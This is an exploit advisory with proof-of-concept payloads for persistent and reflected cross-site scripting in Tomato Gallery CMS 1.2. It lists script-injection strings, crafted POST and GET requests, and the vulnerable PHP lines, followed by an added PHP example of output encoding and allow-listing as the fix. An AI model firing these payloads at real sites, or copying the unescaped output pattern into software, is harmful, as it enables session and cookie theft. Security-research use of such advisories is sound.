Code:
# exploit title: persistent xss in cms tomato 1.2 (logged only)
# date: 8.02.2011
# author: lemlajt
# software link: http://tomatogallery.yzx.se/
# version: 1.2
# tested on: linux
# cve : 
#

 
poc0.1 : 

1. http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php 
2. click @ "Add Separator" and type: bla'';!--<script>alert(document.cookie)</script>=&{()} in the box
3. persistent.

try:
POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/addSeparator.php
?separatorName=bla'';!--<script>alert(document.cookie)</script>=&{()} HTTP/1.1

more:
cat -n $tomato_dir/ajaxinfo/addSeparator.php 

--- cut ------ cut ------ cut ------ cut ---
11    $albumName = $_GET["separatorName"];
--- cut ------ cut ------ cut ------ cut ---

... and more, enjoy! o/

# * csrf?

poc0.2 :

POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/popupSource.php?popup=create-album&album=undefined HTTP/1.1

;]

in second line of ajaxinfo/popupSource.php we see:
$popup = $_GET['popup'];

replace 'create-album' with: ''script

in source of generated page find your alert:

<li id="item_0" style="margin:0; padding:0; list-style:none;" lang="test;!--&lt;script&gt;alert(document.cookie)&lt;/script&gt;=">
<div class="group" onMouseOver="hoverAlbum('in','1')" onMouseOut="hoverAlbum('out','1')" id="album1">
<div class="stripe"></div>
<div class="albumText" style="position:absolute;" id="albumText1" 
onclick="this.innerHTML = this.lang" lang="test';!--<script>alert(document.cookie)</script>=">test';!--<script>alert(document.cookie)</script>=
</div>
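Both root causes shown above (line 11 of addSeparator.php and line 2 of popupSource.php) are the same defect: a request parameter is written straight into the generated HTML, so it lands inside the lang="..." attribute and the innerHTML shown in the page source. The following is an added example, not code from Tomato Gallery; the function names, the render helpers and the allow-list of popup names are assumptions made for illustration. It puts the vulnerable pattern beside the fix: encode for the HTML context at the point of output, and allow-list parameters that select a template rather than echoing them.

```php
<?php
// Added example (not Tomato Gallery's code). Function names and the
// popup allow-list are assumptions for illustration.

// Vulnerable pattern, equivalent to what addSeparator.php does with
// $_GET["separatorName"]: the raw value goes into an attribute and into text.
function render_separator_unsafe(array $get): string {
    $name = $get['separatorName'] ?? '';
    return '<li id="item_0" lang="' . $name . '">' . $name . '</li>';
}

// Encode for the HTML context. ENT_QUOTES also encodes single quotes, which
// matters inside attributes such as lang="..." and inline event handlers;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: same markup, every untrusted value passes through esc().
function render_separator_safe(array $get): string {
    $name = $get['separatorName'] ?? '';
    return '<li id="item_0" lang="' . esc($name) . '">' . esc($name) . '</li>';
}

// For a parameter that selects a template, as $_GET['popup'] does in
// popupSource.php, encoding is not enough: allow-list the known names and
// reject anything else. The list below is constructed for this example.
function select_popup(array $get): ?string {
    $allowed = ['create-album', 'edit-album', 'delete-album'];
    $popup = $get['popup'] ?? '';
    return in_array($popup, $allowed, true) ? $popup : null;
}

// Constructed input using the payload from the advisory.
$input = ['separatorName' => "bla'';!--<script>alert(document.cookie)</script>=&{()}"];

echo render_separator_unsafe($input), "\n"; // the script tag reaches the page verbatim
echo render_separator_safe($input), "\n";   // angle brackets and quotes become entities, inert text

var_dump(select_popup(['popup' => 'create-album'])); // a known name is passed through
var_dump(select_popup(['popup' => "''script"]));     // an unknown value is rejected (null)
```

Run it with `php example.php`. The difference between the two `echo` lines is the whole fix: the browser parses the encoded version as text, never as a tag or as the end of an attribute, so the payload in the advisory stops at rendering instead of executing.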


# file inputs?

poc0.3 : some error when typing:
http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php?album=%27%27;!--%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=&{%28%29}#

poc0.4 : xss via GET

$search = '';!--<script>alert(document.cookie)</script>=&{()}


regards